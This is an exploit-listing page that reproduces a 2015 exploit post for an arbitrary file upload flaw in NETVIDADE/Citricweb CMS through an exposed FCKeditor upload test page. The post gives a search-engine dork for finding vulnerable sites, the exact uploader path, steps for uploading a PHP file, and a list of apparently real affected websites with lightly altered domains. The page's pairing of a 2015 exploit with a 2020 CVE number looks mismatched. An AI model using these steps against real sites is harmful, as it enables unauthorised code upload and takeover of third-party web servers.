Advertisement






NETVIDADE CMS (FCKEDITOR) Arbitrary File Upload Vulnerability

CVE Category Price Severity
CVE-2020-15848 CWE-434 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2015-04-14
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2015040073

Below is a copy:

[+] Exploit Title : NETVIDADE CMS (FCKEDITOR) Arbitrary File Upload Vulnerability
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://www.citricweb.pt
[+] Google Dork : "Desenvolvido por netvidade.com"
[+] Date: 2015-04-14
[+] Tested On : Windows 7 / Mozilla Firefox
[+] Version : All Version

[+]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#%# CITRICWEB (FCKEDITOR) :

[+] Exploit => plugins/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] First Go To => http://site.com/[path]

[+] Then => http://www.site.com/[path]/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] Select => Select the "File Uploader"> Php ... Upload to : Uploaded File URL:

[+] Demos :

[+] http://contamiXga.pt/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] http://prestenergia.coXm/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] http://grasil-confeccoXes.com/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] http://alojamentomXonfortinho.com/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] http://projectomilXenium.com/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html

[+][+][+][+][+][+][+][+][+][+][+]
[+]Discovered By : Cyb3r_Dr4in[+]
[+][+][+][+][+][+][+][+][+][+][+]


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.